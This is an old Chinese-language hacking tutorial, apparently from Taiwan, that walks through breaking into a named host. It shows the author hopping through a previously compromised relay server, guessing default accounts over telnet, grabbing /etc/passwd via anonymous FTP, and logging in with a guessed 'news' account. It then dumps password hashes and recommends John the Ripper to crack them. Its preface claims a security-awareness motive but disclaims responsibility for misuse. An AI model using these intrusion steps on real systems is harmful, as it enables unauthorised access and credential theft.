[前言]
對於著作這份文章的目的並不是在於教育. 因為個人覺得台灣的網路雖然已經有所發展
了. 但是對於網路安全的重要性卻是漠不關心, 或者是沒有足夠的知識, 這是相當危險
的一個現象, 就算是大專院校, 政府機構, 公司行號, 甚至是網路業者 ISP 對於網路
安全和系統管理的正確觀念和態度實在是相當缺乏, 所以說不定在往後的日子裡, 只要
一台 PC 和一台數據機, 就可以讓整個台灣網路崩潰, 甚至是引起經濟危機! 就像是一
個小孩子拿著一把槍在路上逛一樣! 所以我寫這篇文章純粹是為了台灣網路安全而寫的.
並不希望有人因為這篇文章而去做違法的事情, 尤其是破壞別人的系統或是檔案! 當然
啦, 如果有人因此做了違法的事情, 本人概不負責!
[開始]
起先最最最基本的就是要用 telnet 和 ftp 了, 它們兩個可是入侵的好幫手呦
網路上有許多的 telnet 的版本, 有彩色的啦, 中文相容的啦, 很多很多但是如果你不
想花時間去下載的話, 沒關係! 在 windows 下的 Ms-Dos 也有提供一個好用的 telnet
當然也有 ftp 啦! 如果你有 telnet 的軟體的話就打開吧.
沒有的就用 Ms-Dos 的 telnet 只要在 Ms-Dos 下打 telnet 就可以了, 然後就開始吧.
先連到自己的或者是你可以用的主機上
SunOS 5.6
login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.
(這是我以前入侵過的了, 現在我把它當成是中間伺服器了, 當然了 IP 和帳號都已經被我
改了ㄚ, 怎麼可能用真的 IP 呢!
先使用 who 確定一下這個主機現在有什麼人
>who
judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)
看來主機上應該不會有人發現我, 這樣就可以放心的連到要攻擊的目標上了
>telnet www.fatman.com.tw (先用 telnet 過去)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: guest (先試一試 guest 這個公用帳號看看)
Password:
Login incorrect (啊! 不成功..沒關係. 我再試)
fatman login: news
Password:
Connection closed by foreign host.
(哇~~才兩次不成功就被趕出來了喔....這個系統還真狠..@&!J#~!)
> telnet www.fatman.com.tw (沒關係...再給它玩看看)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: fatman (駭客的第六感...)
Passwd:
Login incorrect
fatman login: system (這是系統的預設帳號...)
Passwd:
Login incorrect (看來已經被改過了..)
Connection closed by foreign host.
>ftp www.fatman.com.tw (改用 ftp 看看)
Connected to www.fatman.com.tw.
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 15:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): fatman (還是一樣試一下公司的名字)
331 Password required for fatman.
Password:
530 Login incorrect.(真失敗, 今天運氣好像不太好的樣子)
Login failed.
ftp> user anonymous (用 anonymous 的公用帳號看看好了)
331 Guest login ok, send your complete e-mail address as password.
Password: (密碼隨便打..千萬別傻到打真的e-mail..打 qq@ 就好)
230 Guest login ok, access restrictions apply.
ftp>pwd
(終於進來了..好辛苦..先看看自己在那個資料夾在說)
257 "/" is current directory.
ftp> ls -la (尋找一下目標 /etc)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 8
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 bin
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 etc
drwxrwxr-x 2 root wheel 1024 Dec 3 1993 incoming
drwxrwxr-x 2 root wheel 1024 Nov 17 1993 lib
drwxrwxr-x 2 root wheel 1024 Feb 2 01:20 pub
drwxrwxr-x 3 root wheel 1024 Jun 10 1996 usr
226 Transfer complete.
491 bytes received in 3.13 seconds (0.16 Kbytes/sec)
ftp> cd etc (嘻嘻....找到目標了)
250 CWD command successful. (嗯! 可以進來...)
ftp> ls -la (看一下有沒有我們要的密碼檔 /etc/passwd )
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 4
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
-rwxrwxr-x 1 root wheel 258 Dec 3 1993 group
-rwxrwxr-x 1 root wheel 532 Dec 3 1993 passwd
226 Transfer complete.
251 bytes received in 0.00 seconds (251000.00 Kbytes/sec)
ftp> get passwd (不會吧, 竟然那麼容易, 二話不說, 馬上抓密碼檔下來)
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (321 bytes).
226 Transfer complete.
5515 bytes received in 1.60 seconds (1.01 Kbytes/sec)
ftp>bye (馬上走人)
221 Goodbye.
>cat passwd (看一下剛才的密碼檔是)
root:*:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
.
.
.
[以下省略]
(真衰, 是 shadow 過的密碼檔, 也難怪用 anonymous 就能抓下來, 如果就只有這個
的話就無法解開密碼了, 但是可以從裡面的帳號知道 fatman 有提供那些服務. 像是
uucp, mail, ftp, news, operator 是開機用的, 所以沒有用 .daemon 是用來分佩
每一個帳號 的權限用的)
>rm passwd (還是把它給消掉好了)
>^D
(再次入侵攻擊開始)
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login:nobody (先試一試被 shadow 過的密碼檔裡的帳號)
Password: (密碼也打 nobody )
Login incorrect
fatman login:news (再試一下這個好了)
Password: (也是 news )
Linux 2.0.29.
You have mail. (嗚哇啦! 進來了, 千萬別看別人的信喔)
fatman:~$ cd /etc (看能不能進來)
fatman:/etc$ ls (看一下)
DIR_COLORS hosts passwd.old
HOSTNAME hosts.allow passwd.save
HOSTNAME~ hosts.allow~ passwd~
group~ passwd
host.conf passwd.OLD
fatman:/etc$ cat passwd (接下來就直接看密碼再說)
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
poja:p7ptVmOq3nrUL.:559:100:XXXXXXXX:/home/w3/poja:/bin/bash
michelle:AmcgVpzMufCZJs:560:100:michelle:/home/w3/kingtel/michelle:/bin/bash
.
.
.
[以下省略.密碼檔我已經盡量碼賽克了]
(哇! 太好了! 趕快換 ftp 來秀一下吧)
fatman:/etc$ ^C
>ftp www.fatman.com.tw
Connected to www.fatman.com.tw.
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 16:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): news (用剛才入侵時的那個..)
331 Password required for news.
Password:
331 news login ok!
ftp>cd /etc
250 CWD command successful.
ftp>get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (5921 bytes).
226 Transfer complete.
5515 bytes received in 2.80 seconds (1.97 Kbytes/sec)
ftp>bye (落跑了. 閃喔!)
221 Goodbye.
拿到密碼檔(/etc/passwd)後要做的就是破解它呀, 看來我必須在這裡說明一下
passwd 的格式和意義了...
例如:
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
密碼格式大多都是這個樣子的. 然後每一欄都是用分號分開的, 大多是 6 個分號
當然密碼格式有很多種, 據我所知. 目前我看過的密碼格式有 5 種了, 但是大多數
應該都是用 6 個分號的這種為多, 然而每一欄代表的意義如下..
root:使用者名稱
L3mUc0CQtJbtQ:是已經經過編譯的密碼(coded-password)
0:UID(User Identification Number),就是使用者辨識碼
0:GID,就是使用群組的辨識碼
root:comments, 註解欄, 可能是電話號碼 or 住址
/root:home directory, 就是所謂的來源目錄, 即你的工作目錄
/bin/bash:這一欄是表示使用者簽入系統後, 第一個執行的程式
因為是已經編譯過的單向密碼(One-Way Passwd), 所以不可能反組譯, 就只能使用所
謂的暴力破解法了, 關於暴力破解法的程式有很多, 在此就不討論了解! 我想你應該
都知道才對! 建議你我用的是 John4.0